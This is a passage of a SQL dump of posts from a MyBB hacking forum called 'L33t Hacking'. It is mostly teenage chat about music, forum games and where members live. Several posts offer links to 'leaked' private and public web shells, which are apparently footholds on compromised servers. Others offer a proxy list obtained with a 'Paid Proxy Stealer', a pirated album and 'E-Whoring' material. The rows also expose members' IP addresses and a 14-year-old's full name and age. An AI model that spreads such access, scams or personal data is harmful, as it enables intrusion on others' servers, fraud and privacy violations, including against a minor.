song we know\nWe said someday we\'d find out how if feels\nTo sing to more than just the steering wheel.\n\n\nKim\'s the first girl I kissed\nI was so nervous that I nearly missed\nShe\'s had a couple of kids since then\nI haven\'t seen her since God knows when\n\nOh oh oh\nOh God I\n\nEvery memory of walking out the front door\nI found the photo of the friend that I was looking for\nIt\'s hard to say it, time to say it\nGoodbye, goodbye\n\nI miss that town\nI miss their faces\nYou can\'t erase\nYou can\'t replace it', '99.108.180.49', '1668068401', '1', '0', '194', '1348109043', '1', 'c0af60cf55806465ab959db514848e89', '0', '1348109043'); INSERT INTO mybb_posts VALUES('2378', '488', '2355', '8', 'RE: What are you listening to?', '0', '194', 'Slender Man', '1348109278', 'Song Link: http://www.youtube.com/watch?v=JU1BlSgTXxw\n\nArtist: Rise Against \nSong: Savior\n\nEnjoy!', '99.108.180.49', '1668068401', '1', '0', '194', '1348109302', '1', '2e3fa24893bd9bff4630f82296839d64', '0', '1348109302'); INSERT INTO mybb_posts VALUES('2379', '479', '2358', '49', 'RE: [Suggestion] Forum Logo resized', '0', '1', 't3h jok3r', '1348109309', '[quote=\'iTzIpod\' pid=\'2358\' dateline=\'1348106321\']\r\n[quote=\'t3h jok3r\' pid=\'2357\' dateline=\'1348106145\']\r\nCool, I will let you know. The text looks perfect to me but I can be wrong, I think the icon needs to be smaller.\r\n[/quote]\r\n\r\nIn my opinion, I think it\'s the text size and logo/icon size..\r\nJust shrink it by a little and that\'s it. Because on my Mobile, the tabs are all pushed to the right making it overlap each other. (Tabs = Home, Upgrade, Search, Member List, Help, Contact)\r\n[/quote]\r\n\r\nWell every phone has a different screen resolution. I would say lets wait til the logo gets centered then I will check through all kinds of devices. Also it\'s toplinks (AKA header links)', '72.231.24.165', '1223104677', '1', '0', '0', '0', '1', 'cad1a46ea9b505aef645fd0e6e823fca', '0', '0'); INSERT INTO mybb_posts VALUES('2380', '487', '2375', '56', 'RE: Corrupt a wish', '0', '1', 't3h jok3r', '1348109426', '[quote=\'Slender Man\' pid=\'2375\' dateline=\'1348108217\']\r\nToo bad, she has saggy boobs and is a man. XD \r\n\r\nI wish I was President :D\r\n[/quote]\r\n\r\nPeople would hate you for being selfish :P\r\n\r\nI wish I could fly.', '72.231.24.165', '1223104677', '1', '0', '0', '0', '1', '901af87158b8f33dfb21c2f6ef4b32a4', '0', '0'); INSERT INTO mybb_posts VALUES('2381', '490', '0', '49', 'Forum Suggestion', '0', '194', 'Slender Man', '1348110073', 'How about adding a gaming forum?', '99.108.180.49', '1668068401', '1', '0', '0', '0', '1', 'fdbc316e696f6cc54de9093d1d9b9039', '0', '0'); INSERT INTO mybb_posts VALUES('2382', '489', '2377', '8', 'RE: What are your favorite lyrics?', '0', '82', 'iTzIpod', '1348110908', '[quote=\'Slender Man\' pid=\'2377\' dateline=\'1348108828\']\r\nI would say my favorite lyrics are from a song called Photograph by Nickelback. Brings back memories. Here are some lyrics: \r\n\r\nRemember the old arcade?\r\nBlew every dollar that we ever made\r\nThe cops hated us hanging out\r\nThey said somebody went and burned it down\r\n\r\nWe used to listen to the radio\r\nAnd sing along with every song we know\r\nWe said someday we\'d find out how if feels\r\nTo sing to more than just the steering wheel.\r\n\r\n\r\nKim\'s the first girl I kissed\r\nI was so nervous that I nearly missed\r\nShe\'s had a couple of kids since then\r\nI haven\'t seen her since God knows when\r\n\r\nOh oh oh\r\nOh God I\r\n\r\nEvery memory of walking out the front door\r\nI found the photo of the friend that I was looking for\r\nIt\'s hard to say it, time to say it\r\nGoodbye, goodbye\r\n\r\nI miss that town\r\nI miss their faces\r\nYou can\'t erase\r\nYou can\'t replace it\r\n[/quote]\r\n\r\nWow, that song brings back a lot of memories for me :/ I remember the first time I listened to Nickelback, the time I listened to this song, the time I went to his concert... Brings back memories...', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', '5e28c5561e368b453216574cf72bc80e', '0', '0'); INSERT INTO mybb_posts VALUES('2383', '491', '0', '8', 'Free Album!', '0', '194', 'Slender Man', '1348111300', 'I don\'t know if we have any Papa Roach fans on the site ,but I thought you guys might want to get in on this. I\'ve got a link to get his new album \"The Connection\" for FREE! Just released today!\n\n[align=center][img]http://www.mp3boo.com/cover/medium456.jpg[/img]\n\nTracklist\n01. Engage\n02. Still Swingin’\n03. Where Did The Angels Go\n04. Silence Is The Enemy\n05. Before I Die\n06. Wish You Never Met Me\n07. Give Me Back My Life\n08. Breathe You In\n09. Leader Of The Broken Hearts\n10. Not That Beautiful\n11. Walking Dead\n12. Won’t Let Up\n13. As Far As I Remember\n\nDownload Link: http://potload.com/0f429pfs1vih[/align]\n\nAlso I can get other albums,(from other bands) So if you want a specific one. PM me.', '99.108.180.49', '1668068401', '1', '0', '194', '1348111493', '1', '051fc7fbf04c0cbf7c08e5821e525231', '0', '1348111493'); INSERT INTO mybb_posts VALUES('2384', '490', '2381', '49', 'RE: Forum Suggestion', '0', '82', 'iTzIpod', '1348111341', 'This has been requested many times. There is currently one in the process of making. Please be patient as it\'ll be added soon. :)', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', '78a757ad173ecab8e582df139f74dd73', '0', '0'); INSERT INTO mybb_posts VALUES('2385', '489', '2356', '8', 'RE: What are your favorite lyrics?', '0', '194', 'Slender Man', '1348111389', 'I got to there concert every year. Always enjoy it.', '99.108.180.49', '1668068401', '1', '0', '0', '0', '1', 'fdfc1fc558cc40cf6e7d1ec3a226f8d3', '0', '0'); INSERT INTO mybb_posts VALUES('2386', '490', '2381', '49', 'RE: Forum Suggestion', '0', '194', 'Slender Man', '1348111537', 'Oh, ok I\'ll wait for it. Thanks!', '99.108.180.49', '1668068401', '1', '0', '0', '0', '1', '0f85771f8e3c9ef5dea2a05a92c3212a', '0', '0'); INSERT INTO mybb_posts VALUES('2387', '487', '2380', '56', 'RE: Corrupt a wish', '0', '82', 'iTzIpod', '1348111730', '[quote=\'t3h jok3r\' pid=\'2380\' dateline=\'1348109426\']\r\n[quote=\'Slender Man\' pid=\'2375\' dateline=\'1348108217\']\r\nToo bad, she has saggy boobs and is a man. XD \r\n\r\nI wish I was President :D\r\n[/quote]\r\n\r\nPeople would hate you for being selfish :P\r\n\r\nI wish I could fly.\r\n[/quote]\r\n\r\nGranted. But after being high up in the air, you start to fall with your parachute broken causing you to hit the ground face first at 700 km/hour ;)\r\n\r\n\r\nWish: I wish I had 1000 posts.', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', 'e0be022590ce26593f8d8eb48764f030', '0', '0'); INSERT INTO mybb_posts VALUES('2388', '487', '2354', '56', 'RE: Corrupt a wish', '0', '194', 'Slender Man', '1348111885', 'To bad you get banned for spamming :p\n\nI wish I had unlimited wishes. :D', '99.108.180.49', '1668068401', '1', '0', '0', '0', '1', '39d113bdee2d24817c2686d72364d0ea', '0', '0'); INSERT INTO mybb_posts VALUES('2389', '171', '528', '8', 'RE: What Genre do you listen to?', '0', '194', 'Slender Man', '1348112901', 'I listen mostly to Rock/Alt-Metal. I don\'t really like the screamo stuff though. I also listen to rap and what ever is on the radio now a days.', '99.108.180.49', '1668068401', '1', '0', '0', '0', '1', '149c2893db1e79b23a7e5a637e118605', '0', '0'); INSERT INTO mybb_posts VALUES('2390', '234', '977', '17', 'RE: Free E-Whoring packs website plus free PORN', '0', '194', 'Slender Man', '1348113158', 'Sure why not I could use another addition to my collection...., I mean. Uh yeah E-whore... Let\'s do it. XD', '99.108.180.49', '1668068401', '1', '0', '0', '0', '1', '796ac3e92f0e1fb0e3f619cb9f5d222b', '0', '0'); INSERT INTO mybb_posts VALUES('2391', '491', '2383', '8', 'RE: Free Album!', '0', '82', 'iTzIpod', '1348140927', 'I\'m not really a fan of Papa Roach. Although my friend might :D\n\nThanks for contributing to L33t Hacking. =]', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', 'd8840a43325127521e04c6e8504ba7f1', '0', '0'); INSERT INTO mybb_posts VALUES('2392', '171', '2389', '8', 'RE: What Genre do you listen to?', '0', '82', 'iTzIpod', '1348141214', '[quote=\'Slender Man\' pid=\'2389\' dateline=\'1348112901\']\r\nI listen mostly to Rock/Alt-Metal. I don\'t really like the screamo stuff though. I also listen to rap and [b]what ever is on the radio now a days.[/b]\r\n[/quote]\r\n\r\nI bet you like listening to Carly Rae Jepsen - Call Me Maybe because whenever I go somewhere, my radio is on. And I hear that song 24/7.. -.-', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', '6d8756dd2583bac1bf6a3208f9fcd508', '0', '0'); INSERT INTO mybb_posts VALUES('2393', '487', '2354', '56', 'RE: Corrupt a wish', '0', '82', 'iTzIpod', '1348141307', 'Granted. But you died in a hole and so can no longer wish for anything.\nxD\n\n\nWish: I wish I have 100+ Skype Contacts :( #Forever Alone', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', 'd2ec8cf4d91162fc14ec38d5aee151ee', '0', '0'); INSERT INTO mybb_posts VALUES('2394', '431', '1957', '61', 'RE: [Free] R?????zo?\'s GFX Service', '0', '62', 'R?????zo?', '1348142922', 'for now on I will only do it for unique members, I been busy with my irl work so I cannot take loads of requests and please everyone.\nI\'m working on unique userbar now :)', '94.132.244.168', '1585771688', '1', '0', '0', '0', '1', '3601c6a50dcd9fa866fc932c180eafb1', '0', '0'); INSERT INTO mybb_posts VALUES('2395', '492', '0', '7', 'Where do you guys live? (BigPictures!!)', '0', '53', 'sirchamp', '1348145412', 'Lol. I have always wondered where you guys live. Please reply to this thread with the name of the country you come from and a few infos about it. It feels like I\'m the only one who lives in Europe. I live in a country called Switzerland. In switzerland we speak a dialect of german and normal german. Here are some pics of switzerland\r\n[img]http://upload.wikimedia.org/wikipedia/commons/thumb/f/f3/Flag_of_Switzerland.svg/200px-Flag_of_Switzerland.svg.png[/img]\r\n\r\n[img]http://www.web-kuchi.ch/HotPotatoes/Geografie_ch/kantone/schweiz.gif[/img]\r\n\r\n[img]http://www.berge.ch/berge_az/t/tagderberge/tagderberge.jpg[/img]\r\n\r\n[img]http://www.schweiz-reisefuehrer.info/uploads//startseite-reisefuehrer-schweiz2.jpg[/img]\r\n\r\n[img]http://www.1st-hotel-schweiz.de/uploads/pics/appenzell-landschaft.gif[/img]\r\n\r\n[img]http://www.rickenbach.ch/libraries.bilder/sempachersee.jpg[/img]\r\n\r\nAnd here are pictures of what I see when I look out of the window\r\n\r\n[img]http://www.abload.de/img/30714q81.jpg[/img]\r\n\r\n[img]http://www.abload.de/img/308v7qam.jpg[/img]\r\n\r\n[img]http://www.abload.de/img/3098prze.jpg[/img]\r\n\r\n[img]http://www.abload.de/img/310p7q2b.jpg[/img]\r\n\r\n[img]http://www.abload.de/img/311xnoyz.jpg[/img]\r\n\r\n[img]http://www.abload.de/img/312eap20.jpg[/img]\r\n\r\n[img]http://www.abload.de/img/313s4rc5.jpg[/img]\r\n\r\n\r\n\r\n\r\n\r\n\r\nAnd a small video of my village.\r\n[video=youtube]http://www.youtube.com/watch?v=moZigZazGX4[/video]', '188.155.56.90', '-1130678182', '1', '0', '0', '0', '1', '18a4a21cd86f922e10a6e59c257049ef', '0', '0'); INSERT INTO mybb_posts VALUES('2396', '492', '2395', '7', 'RE: Where do you guys live? (BigPictures!!)', '0', '61', 'NXK', '1348149873', 'I\'m from ontario canada.\r\n\r\nId post pics But i\'m on my phone.', '38.104.158.106', '644390506', '1', '0', '0', '0', '1', '115a2926813b1a56b6993d5ccedd6386', '0', '0'); INSERT INTO mybb_posts VALUES('2397', '112', '283', '19', 'RE: ??? Ultimate Premium PPD Ebooks Give away ???', '0', '172', 'MistaCode', '1348158540', 'I would like to get this ;) Thanks in advance dude.', '88.193.83.195', '1489064899', '0', '0', '0', '0', '1', '93d21953d626d02f00a22f15da6a6475', '0', '0'); INSERT INTO mybb_posts VALUES('2398', '439', '2051', '58', 'RE: Unique - Recruitment', '0', '172', 'MistaCode', '1348158893', 'Name: Aleksanteri Korhonen\nAge: 14\nUsername: MistaCode\nProfile Link: /user-172.html\nAre you Unique?: Yeah :D\nAre you HQ?: Ofcourse I am !\nWhy do you wish to get into our group?: As its an official group of L33thacking so I decided to give it a try!\nWill you do to contribute to Unique?: Didn\'t understand the question very well, but yeah I will stay active & HQ till this website goes down !', '88.193.83.195', '1489064899', '0', '0', '0', '0', '1', '54c98e0435b4e0533434889a35d26384', '0', '0'); INSERT INTO mybb_posts VALUES('2399', '492', '2395', '7', 'RE: Where do you guys live? (BigPictures!!)', '0', '62', 'R?????zo?', '1348168225', 'I\'m from Portugal:\n\n[img]http://portugal.pordescubrir.com/wp-content/uploads/2008/05/mapa-portugal.jpg[/img]\n\n\nheres where i live:\n[img]http://www.mochileiros.com/otf_pic.php?pic_cat=users_pics&pic_id=user_19194_cascais1.jpg[/img]', '94.132.244.168', '1585771688', '1', '0', '82', '1348170755', '1', '54bb488aa0110c0e8d1abc2d984d3c83', '0', '1348170755'); INSERT INTO mybb_posts VALUES('2404', '492', '2395', '7', 'RE: Where do you guys live? (BigPictures!!)', '0', '61', 'NXK', '1348178718', 'Here is some pics of ontario canada\n\nThis is toronto\n[img]http://media-cdn.tripadvisor.com/media/photo-s/02/82/46/97/toronto-skyline.jpg[/img]\n[img]http://www.toronto.ca/attractions/images/aerial_hanlen_large.jpg[/img]\n\nHeres meh cottage (A cottage is like a second house on a lake)\n[img]https://fbcdn-sphotos-g-a.akamaihd.net/hphotos-ak-snc6/270556_10150685955650012_6231596_n.jpg[/img]', '99.253.94.204', '1677549260', '1', '0', '0', '0', '1', '78068f31b0e66c87b3b59920e24554d5', '0', '0'); INSERT INTO mybb_posts VALUES('2400', '492', '2399', '7', 'RE: Where do you guys live? (BigPictures!!)', '0', '61', 'NXK', '1348168307', '[quote=\'R?????zo?\' pid=\'2399\' dateline=\'1348168225\']\nI\'m from Portugal:\n\n[img]http://portugal.pordescubrir.com/wp-content/uploads/2008/05/mapa-portugal.jpg[/img]\n\n\nheres where i live:\n[img]http://www.mochileiros.com/otf_pic.php?pic_cat=users_pics&pic_id=user_19194_cascais1.jpg[/img]\n\n\n\nI\'m kind of jelly. Such a beautiful place.', '99.253.94.204', '1677549260', '1', '0', '82', '1348170710', '1', '85512562535b606c1a6da99498931399', '0', '1348170710'); INSERT INTO mybb_posts VALUES('2401', '439', '2398', '58', 'RE: Unique - Recruitment', '0', '82', 'iTzIpod', '1348169227', '[quote=\'MistaCode\' pid=\'2398\' dateline=\'1348158893\']\r\nName: Aleksanteri Korhonen\r\nAge: 14\r\nUsername: MistaCode\r\nProfile Link: /user-172.html\r\nAre you Unique?: Yeah :D\r\nAre you HQ?: Ofcourse I am !\r\nWhy do you wish to get into our group?: As its an official group of L33thacking so I decided to give it a try!\r\nWill you do to contribute to Unique?: Didn\'t understand the question very well, but yeah I will stay active & HQ till this website goes down !\r\n[/quote]\r\n\r\nLast question means like what will you contribute in our Unique Section?', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', '43f3bbd75bd8deb45030ca64e3f08d15', '0', '0'); INSERT INTO mybb_posts VALUES('2402', '492', '2395', '7', 'RE: Where do you guys live? (BigPictures!!)', '0', '82', 'iTzIpod', '1348169503', 'I don\'t think you should show any \"Adult Content\" anywhere outside of the E-Whoring Section. Please remove it @Reloadzor.\n\n\nOT: I live in Canada, Ontario. \nDon\'t really have pictures...', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', '4b0a58b83d39c6d192074acb3e419c64', '0', '0'); INSERT INTO mybb_posts VALUES('2403', '492', '2395', '7', 'RE: Where do you guys live? (BigPictures!!)', '0', '62', 'R?????zo?', '1348169839', 'I\'ve removed it, even though its not adult content. It\'s a topless beach what to expect :P', '94.132.244.168', '1585771688', '1', '0', '62', '1348169856', '1', '58ef3c574baca39f4c0319931b808824', '0', '1348169856'); INSERT INTO mybb_posts VALUES('2405', '493', '0', '35', 'My Ugly Gamer Userbars', '0', '82', 'iTzIpod', '1348181350', 'Can you please rate these? Or just rate whichever one you think is the best? \r\n\r\nNXK has already chosen a Userbar for his Gamer Usergroup if I\'m not mistaken. But I just wanna know which Userbar I made is the best :p\r\n\r\n[img]http://i.imgur.com/6IrpX.png[/img]\r\n[img]http://i.imgur.com/TA6YN.png[/img]\r\n[IMG]http://i.imgur.com/X7sfo.png[/IMG]\r\n[IMG]http://i.imgur.com/6Qoo4.png[/IMG]\r\n[img]http://i.imgur.com/iLWJi.png[/img]\r\n[IMG]http://i.imgur.com/r6WJM.png[/IMG]\r\n[IMG]http://i.imgur.com/hvGIF.png[/IMG]\r\n[IMG]http://i.imgur.com/ordbC.png[/IMG]\r\n[IMG]http://i.imgur.com/sNucP.png[/IMG]\r\n[IMG]http://i.imgur.com/CWKlk.png[/IMG]\r\n[IMG]http://i.imgur.com/jXBZk.png[/IMG]\r\n[IMG]http://i.imgur.com/0pJoK.png[/IMG]', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', '65946ecca2a3ee84d7d563b9ecd85240', '0', '0'); INSERT INTO mybb_posts VALUES('2406', '494', '0', '42', 'Chinese Man Has Lived on Water Alone for the Last 12 Years', '0', '82', 'iTzIpod', '1348181688', 'How long can you survive without food? It all depends on a person’s weight, overall health and metabolic rate, but according to scientific data, a human being can’t go much longer than 3 weeks without food. Now, a 22-year-old man from China means to challenge this theory claiming he has survived 12 years on water alone.\r\n\r\nNing Xuefa, a young man from China’s Henan province, has recently made headlines for claiming he hasn’t had a bite of food in the last 12 years. Looking at the 1.50-meter-tall, 40-kg-heavy Ning one can tell he doesn’t like to eat much, but his story seems almost impossible to believe. He told Chinese media that he completely renounced food when he was just a 10-year-old child. Just looking at bread or vegetables at the dinner table made him nauseous, and he always had a dry throat and a weird sensation like something was stuck there that made him drink lots of water all day long. He currently consumes up to 15 liters of water in a day, and his father back up his story that he never touches a single scrap of food, whether it’s rice, steamed bread or meat.\r\n\r\n\r\nThe closest thing to food that doesn’t make Ning Xuefa sick is milk, but his family is too poor to buy milk for him every day. So the thirsty young man is forced to survive on water alone. He tried to get a job in construction to help out his parents, but his weak body, frail constitution and the constant need to go to the bathroom even at night eventually got him fired. Ning had to return home and depend on his family for help. But, considering his eating habits, I don’t think they consider him a big burden.\r\n\r\nNing Xuefa has also been examined by doctors and diagnosed with a rare chronic thirst-inducing disease, but they haven’t yet been able to determine how he was able to survive all these years without any kind of food. Usually I’d be quick to classify this story as bogus, but I remember writing about the Indian Yogi who proved he can survive on air alone, and the woman who didn’t drink water for 78 years. I’ll try to keep an eye on this story to see how it develops.\r\n\r\n[url=http://www.odditycentral.com/news/chinese-man-has-lived-on-water-alone-for-the-last-12-years.html]Source.[/url]', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', 'b8d8f9dec749b3048828f2fce45c1549', '0', '0'); INSERT INTO mybb_posts VALUES('2407', '495', '0', '61', 'Fresh Shells!', '0', '82', 'iTzIpod', '1348182692', 'These were from 3 days ago.\nStill new.\n\nAlso, these are unchecked. Sorry.\n\nLink: http://adf.ly/D20v7', '24.212.197.164', '416597412', '1', '0', '82', '1348182735', '1', '82173d3dcee5cf341bfbb02a42f34380', '0', '1348182735'); INSERT INTO mybb_posts VALUES('2408', '496', '0', '14', 'Free Proxy List', '0', '82', 'iTzIpod', '1348183815', 'Hey LH, \r\nThis is a Free Proxy List I\'m giving away. (This was leaked)\r\nTo view:\r\nhttp://adf.ly/D22fs\r\n\r\nTo Download: \r\nhttp://adf.ly/D22jY', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', '37ea95a7d93765ff34c578ad0544c3a6', '0', '0'); INSERT INTO mybb_posts VALUES('2409', '497', '0', '61', '10k+ Proxy List', '0', '82', 'iTzIpod', '1348184132', 'Used a Paid Proxy Stealer to get these.\r\n\r\nTo View: http://adf.ly/D233R\r\n\r\nTo Download: http://adf.ly/D23ET', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', '11181867219b567769ec07b18545f96e', '0', '0'); INSERT INTO mybb_posts VALUES('2410', '498', '0', '61', 'Thousands of Private & Public Shells', '0', '82', 'iTzIpod', '1348184444', 'Thousands of HQ and well-working private and public shells leaked from HF. \r\n\r\n\r\n[url=http://adf.ly/D23ZG]Click to View[/url]\r\n\r\n\r\n\r\n[url=http://adf.ly/D23Vv]Click to Download[/url]', '24.212.197.164', '416597412', '1', '0', '1', '1348191793', '1', '1227f5849c634a2a9a98bc7efff3157c', '0', '1348191793'); INSERT INTO mybb_posts VALUES('2411', '499', '0', '7', '1 Month', '0', '82', 'iTzIpod', '1348189749', 'It\'s official! :D I have been registered on L33t Hacking for 1 whole month now! :D I\'m so happy. Thanks everyone for being active. Because the more the active, the more the fun. \r\n\r\n\r\n- iTzIpod', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', '2239b546db465b535fe0e982601b052e', '0', '0'); INSERT INTO mybb_posts VALUES('2412', '490', '2381', '49', 'RE: Forum Suggestion', '0', '1', 't3h jok3r', '1348191264', 'Before it these forums get added, what kind of forums would you all like to see?', '72.231.24.165', '1223104677', '1', '0', '0', '0', '1', '912ee46f4e787ad08365eaa8b9f15b02', '0', '0'); INSERT INTO mybb_posts VALUES('2413', '499', '2411', '7', 'RE: 1 Month', '0', '194', 'Slender Man', '1348191276', 'Congrats! See you at 2 months! Also my first whole month!', '99.108.180.49', '1668068401', '1', '0', '0', '0', '1', 'd0131583bd1f77ab6824681863dbe672', '0', '0'); INSERT INTO mybb_posts VALUES('2414', '487', '2393', '56', 'RE: Corrupt a wish', '0', '1', 't3h jok3r', '1348191724', '[quote=\'iTzIpod\' pid=\'2393\' dateline=\'1348141307\']\r\nGranted. But you died in a hole and so can no longer wish for anything.\r\nxD\r\n\r\n\r\nWish: I wish I have 100+ Skype Contacts :( #Forever Alone\r\n[/quote]\r\n\r\nToo bad then you would get bombed with advertising messages and have no time for homework.\r\n\r\nI wish LH becomes so successful that my website would be on the top 10 hacker community list.', '72.231.24.165', '1223104677', '1', '0', '0', '0', '1', '264a8ed5366d8bc7a866bbf089e56f39', '0', '0'); INSERT INTO mybb_posts VALUES('2415', '431', '1957', '61', 'RE: [Free] R?????zo?\'s GFX Service', '0', '1', 't3h jok3r', '1348191889', 'Uhh oh OK, no problem. BTW yes I did like your work.', '72.231.24.165', '1223104677', '1', '0', '0', '0', '1', '47bf061ee9bb7331410f1ce7229738bb', '0', '0'); INSERT INTO mybb_posts VALUES('2416', '493', '2405', '35', 'RE: My Ugly Gamer Userbars', '0', '1', 't3h jok3r', '1348191968', 'Hahahaha lmao. Your userbars suck lol lol, thanks for admitting that your userbars are ugly :P\n\nJK\n\nThey aren\'t that bad :)', '72.231.24.165', '1223104677', '1', '0', '0', '0', '1', '966ddbbf0809c756dbc24a3ee8100e0c', '0', '0'); INSERT INTO mybb_posts VALUES('2417', '493', '2405', '35', 'RE: My Ugly Gamer Userbars', '0', '194', 'Slender Man', '1348193539', 'I like the old-fashioned Mario ones. 7/10', '99.108.180.49', '1668068401', '1', '0', '0', '0', '1', '24ea5f2c660db0f2694342f179545276', '0', '0'); INSERT INTO mybb_posts VALUES('2418', '492', '2395', '7', 'RE: Where do you guys live? (BigPictures!!)', '0', '194', 'Slender Man', '1348193639', 'I live in Avon, Indiana USA. Don\'t have pics... Sorry.', '99.108.180.49', '1668068401', '1', '0', '0', '0', '1', 'a545a4a5b69f760639f6e7368ab524d3', '0', '0'); INSERT INTO mybb_posts VALUES('2419', '499', '2411', '7', 'RE: 1 Month', '0', '82', 'iTzIpod', '1348194211', 'Lool. Good luck. And thanks. =]', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', '4b3b1d962f27aa87ea4a8eec7f672a38', '0', '0'); INSERT INTO mybb_posts VALUES('2420', '487', '2354', '56', 'RE: Corrupt a wish', '0', '82', 'iTzIpod', '1348194292', 'Granted. But then your account got suspended. (I don\'t know what I just said..)\n\nI wish I was the coolest dude in town.', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', '613d7c05a944864584c938341655f9f9', '0', '0'); INSERT INTO mybb_posts VALUES('2421', '493', '2405', '35', 'RE: My Ugly Gamer Userbars', '0', '82', 'iTzIpod', '1348194329', 'Ahahaha lol. Thanks :D Means a lot to me.', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', '14fbbaa51879b754837c18611f03f61a', '0', '0'); INSERT INTO mybb_posts VALUES('2422', '490', '2381', '49', 'RE: Forum Suggestion', '0', '82', 'iTzIpod', '1348194651', 'All the games. Or, the popular games?\n\nCounter Strike\nCoD\nNexon Games (Maplestory, Dungeon Fighter Online, Combat Arms, etc}\nGears of War\n[b]Minecraft[/b] xD LOL @Bold :3', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', '7eefef3b766a6c3fc9b3cdfa01e256c4', '0', '0'); INSERT INTO mybb_posts VALUES('2423', '492', '2395', '7', 'RE: Where do you guys live? (BigPictures!!)', '0', '53', 'sirchamp', '1348236435', 'Wow I\'d love to live right next to a (topless) beach. @NXK Nice pond or lake in front of your holiday house.', '188.155.56.90', '-1130678182', '1', '0', '0', '0', '1', '0749f91bbb59c31594ffd2fa2155bb50', '0', '0'); INSERT INTO mybb_posts VALUES('2424', '492', '2423', '7', 'RE: Where do you guys live? (BigPictures!!)', '0', '61', 'NXK', '1348241010', '[quote=\'sirchamp\' pid=\'2423\' dateline=\'1348236435\']\r\nWow I\'d love to live right next to a (topless) beach. @NXK Nice pond or lake in front of your holiday house.\r\n[/quote]\r\n\r\nIt\'s a lake aha, That\'s just a river that connects to it.', '99.253.94.204', '1677549260', '1', '0', '0', '0', '1', '1327c5dae754222cba88a86b51461af4', '0', '0'); INSERT INTO mybb_posts VALUES('2425', '493', '2405', '35', 'RE: My Ugly Gamer Userbars', '0', '61', 'NXK', '1348245092', 'I\'m using the first one out of that list now, If someone makes something better than ill change it but right now I love the first one.', '99.253.94.204', '1677549260', '1', '0', '0', '0', '1', '7e0c067043b1b682fcf650aba3512f84', '0', '0'); INSERT INTO mybb_posts VALUES('2426', '439', '2401', '58', 'RE: Unique - Recruitment', '0', '172', 'MistaCode', '1348245262', '[quote=\'iTzIpod\' pid=\'2401\' dateline=\'1348169227\']\r\n[quote=\'MistaCode\' pid=\'2398\' dateline=\'1348158893\']\r\nName: Aleksanteri Korhonen\r\nAge: 14\r\nUsername: MistaCode\r\nProfile Link: /user-172.html\r\nAre you Unique?: Yeah :D\r\nAre you HQ?: Ofcourse I am !\r\nWhy do you wish to get into our group?: As its an official group of L33thacking so I decided to give it a try!\r\nWill you do to contribute to Unique?: Didn\'t understand the question very well, but yeah I will stay active & HQ till this website goes down !\r\n[/quote]\r\n\r\nLast question means like what will you contribute in our Unique Section?\r\n[/quote]\r\n\r\nWell then it would be, What ever the section needs ;)', '88.193.83.195', '1489064899', '0', '0', '0', '0', '1', 'ca6dc57576ef50fa8487857b1cdb6290', '0', '0'); INSERT INTO mybb_posts VALUES('2427', '487', '2420', '56', 'RE: Corrupt a wish', '0', '61', 'NXK', '1348245265', '[quote=\'iTzIpod\' pid=\'2420\' dateline=\'1348194292\']\r\nGranted. But then your account got suspended. (I don\'t know what I just said..)\r\n\r\nI wish I was the coolest dude in town.\r\n[/quote]\r\nbut than all the bitches would love you and be like, yo smooth can you teach me how to dougie?\r\n\r\nI wish i wasn\'t in school right now', '99.253.94.204', '1677549260', '1', '0', '0', '0', '1', 'e47f850e39087b399a98e66c6b155304', '0', '0'); INSERT INTO mybb_posts VALUES('2428', '487', '2427', '56', 'RE: Corrupt a wish', '0', '82', 'iTzIpod', '1348255103', '[quote=\'NXK\' pid=\'2427\' dateline=\'1348245265\']\r\n[quote=\'iTzIpod\' pid=\'2420\' dateline=\'1348194292\']\r\nGranted. But then your account got suspended. (I don\'t know what I just said..)\r\n\r\nI wish I was the coolest dude in town.\r\n[/quote]\r\nbut than all the bitches would love you and be like, yo smooth can you teach me how to dougie?\r\n\r\nI wish i wasn\'t in school right now\r\n[/quote]\r\n\r\nI don\'t mind if I need to teach bitches how to dougie :cool:\r\n\r\nGranted. You are now teleported to a club. With a bunch of teachers! :D\r\n:roflol:\r\n\r\n\r\nI wish I made a successful Youtube Channel', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', '55d5dd4be5e022272c3182ae5bb7e56f', '0', '0'); INSERT INTO mybb_posts VALUES('2429', '439', '2051', '58', 'RE: Unique - Recruitment', '0', '82', 'iTzIpod', '1348255150', '@MistaCode, you can leak/leech/release stuff in there (Programs, Proxies, Shells, VPNs, eBooks, etc).', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', 'bc98245dea507cb1630f43e6bf0d9e82', '0', '0'); INSERT INTO mybb_posts VALUES('2430', '493', '2405', '35', 'RE: My Ugly Gamer Userbars', '0', '82', 'iTzIpod', '1348255180', 'When are you making the Usergroup though? :o', '24.212.197.164', '416597412', '1', '0', '82', '1348255188', '1', 'e3b86296ad513ff65ab133231f3f884c', '0', '1348255188'); INSERT INTO mybb_posts VALUES('2431', '494', '2406', '42', 'RE: Chinese Man Has Lived on Water Alone for the Last 12 Years', '0', '2', 'Apathy', '1348260285', 'This seems awesome but sucks for the guy. :3', '173.206.137.64', '-1378973376', '0', '0', '0', '0', '1', '99554c9c3a8f0f981a7180cb6e8f4d02', '0', '0'); INSERT INTO mybb_posts VALUES('2432', '439', '2051', '58', 'RE: Unique - Recruitment', '0', '1', 't3h jok3r', '1348274288', '1. Where are the group requirements?\n2. Where are the userbar and the ficon images?', '72.231.24.165', '1223104677', '1', '0', '0', '0', '1', '266558a60847e5f6bfc2f858ade6c672', '0', '0'); INSERT INTO mybb_posts VALUES('2433', '487', '2354', '56', 'RE: Corrupt a wish', '0', '1', 't3h jok3r', '1348274353', 'You would be famous and you would have a lot of gay mofos wanting your dick.\n\nI wish I can become the president or vice in my HS.', '72.231.24.165', '1223104677', '1', '0', '0', '0', '1', '84a3a13774ff7b6c281a750a61710020', '0', '0'); INSERT 